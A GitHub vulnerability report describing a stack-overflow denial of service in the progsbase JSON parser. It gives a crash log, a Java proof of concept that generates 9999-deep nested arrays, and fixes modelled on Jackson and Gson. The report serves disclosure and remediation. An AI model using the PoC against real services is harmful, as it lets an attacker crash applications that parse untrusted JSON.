-
Notifications
You must be signed in to change notification settings - Fork 0
Open
Description
Stack overflow error caused by progsbase parsing of untrusted JSON String
Description
Using progsbase to parse untrusted JSON String may be vulnerable to denial of service (DOS) attacks. If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow.
Error Log
Exception in thread "main" java.lang.StackOverflowError
at JSON.LinkedListElements.Structures.LinkedListNodeElements.<init>(LinkedListNodeElements.java:5)
at JSON.LinkedListElements.LinkedListElementsFunctions.LinkedListElementsFunctions.CreateLinkedListElements(LinkedListElementsFunctions.java:12)
at JSON.parser.parser.GetJSONArray(parser.java:190)
at JSON.parser.parser.GetJSONValueRecursive(parser.java:61)
at JSON.parser.parser.GetJSONArray(parser.java:202)
at JSON.parser.parser.GetJSONValueRecursive(parser.java:61)
at JSON.parser.parser.GetJSONArray(parser.java:202)
at JSON.parser.parser.GetJSONValueRecursive(parser.java:61)
at JSON.parser.parser.GetJSONArray(parser.java:202)
at JSON.parser.parser.GetJSONValueRecursive(parser.java:61)
at JSON.parser.parser.GetJSONArray(parser.java:202)
at JSON.parser.parser.GetJSONValueRecursive(parser.java:61)
PoC
<dependency>
<groupId>com.progsbase.libraries</groupId>
<artifactId>JSON</artifactId>
<version>0.4.0</version>
</dependency>
import com.progsbase.libraries.JSON.JSONObjectReader;
public class PoC {
public final static int TOO_DEEP_NESTING = 9999;
public final static String TOO_DEEP_DOC = _nestedDoc(TOO_DEEP_NESTING, "[ ", "] ", "0");
public static String _nestedDoc(int nesting, String open, String close, String content) {
StringBuilder sb = new StringBuilder(nesting * (open.length() + close.length()));
for (int i = 0; i < nesting; ++i) {
sb.append(open);
if ((i & 31) == 0) {
sb.append("\n");
}
}
sb.append("\n").append(content).append("\n");
for (int i = 0; i < nesting; ++i) {
sb.append(close);
if ((i & 31) == 0) {
sb.append("\n");
}
}
return sb.toString();
}
public static void main(String[] args) {
String jsonString = TOO_DEEP_DOC;
JSONObjectReader.readJSON(jsonString);
}
}
Rectification Solution
-
Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (FasterXML/jackson-databind@fcfc499)
-
Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing.((google/gson@2d01d6a20f39881c692977564c1ea591d9f39027))
Metadata
Metadata
Assignees
Labels
No labels